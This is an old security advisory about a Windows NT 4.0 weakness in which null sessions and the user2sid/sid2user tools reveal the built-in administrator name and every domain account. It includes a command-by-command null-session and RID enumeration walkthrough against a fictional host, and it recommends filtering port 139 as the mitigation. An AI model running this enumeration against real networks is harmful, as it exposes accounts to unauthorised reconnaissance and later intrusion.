COMMAND
name of built-in administrator
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Originally this was found by David LeBlanc and Dominique
Brezinski. Evgenii Borisovich Rudnyi pointed this out again. He
wrote two utilities, user2sid and sid2user, which are actually
command line interfaces to WIN32 functions, LookupAccountName and
LookupAccountSid. So, no hacking, just what is permitted by MS.
Now, it happens that to use these function a user have just to be
EVERYONE. It means that an ordinary user can find without a
problem a built-in domain administrator name, which MS recommends
us to rename from administrator to something else (see for
example, course 803, Administrating Windows NT 4.0). Assuming
that user's computer is in the domain, the task is solved by two
steps.
1) Looking up a SID of any domain account, for example Domain
Users
user2sid "domain users"
S-1-5-21-201642981-56263093-24269216-513
Now we know all the subauthorities for the current domain. All the
domain account SIDs are different by the last number only (so
called RID).
2) Looking up an built-in administrator name (RID is always 500)
sid2user 5 21 201642981 56263093 24269216 500
Name is SmallUser
Domain is DomainName
Type of SID is SidTypeUser
Now it is possible to look up all the domain accounts from the
very first one (RID = 1000 for the first account, 1001 for the
second and so on, RIDs are never used again for the current
installation).
sid2user 5 21 201642981 56263093 24269216 1000
sid2user 5 21 201642981 56263093 24269216 1001
...
It should be interesting for everyone to know the history of
developing the domain account database. Well, this is not the
end of the story. The anonymous logon is also in the EVERYONE
group. This means that actually it is possible to find out who is
a built-in administrator and to see the history of the SAM at any
domain into which you can run the anonymous session. Note that
anonymous sessions are not audited by logon/logoff category.
Below is an example of what you can learn provided the netbios
ports are open (the listing is fictional).
nslookup www.xyz.com
Non-authoritative answer:
Name: www.xyz.com
Address: 131.107.2.200
net use \\131.107.2.200\ipc$ "" /user:""
The command completed successfully.
user2sid \\131.107.2.200 "domain users"
S-1-5-21-201642981-56263093-24269216-513
Number of subauthorities is 5
Domain is XYZ_domain
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500
Name is XYZAdmin
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000
Name is
Domain is XYZ_domain
Type of SID is SidTypeDeletedAccount
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001
Name is Simpson
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112
LookupSidName failed - no such account
For those who would like to try it, the utilities can be found at:
http://www.ntbugtraq.com
and follow the links to the new downloads page where you'll find
his usage page with a link to the zip.
SOLUTION
SP3 does not prevent this to happen. At this time, there is no
fix for this, except to filter connections to port 139. So, at
the moment, if you can get a null session, you can dump all the
users, groups, and machine accounts.